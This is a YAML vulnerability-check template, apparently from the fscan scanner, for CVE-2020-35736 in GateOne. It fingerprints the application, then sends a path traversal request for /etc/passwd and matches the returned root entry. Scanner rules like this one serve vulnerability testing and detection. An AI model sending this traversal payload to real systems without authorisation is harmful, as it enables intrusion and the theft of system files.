mirror of https://github.com/qwqdanchun/fscan.git
16 lines
551 B
YAML
16 lines
551 B
YAML
name: poc-yaml-gateone-cve-2020-35736
|
|
rules:
|
|
- method: GET
|
|
follow_redirects: true
|
|
path: "/"
|
|
expression: response.status == 200 && response.body.bcontains(b"GateOne.init") && response.body.bcontains(b"href=\"/static/gateone.css\"")
|
|
- method: GET
|
|
follow_redirects: false
|
|
path: "/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
|
|
expression: |
|
|
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
|
detail:
|
|
author: tangshoupu
|
|
links:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-35736
|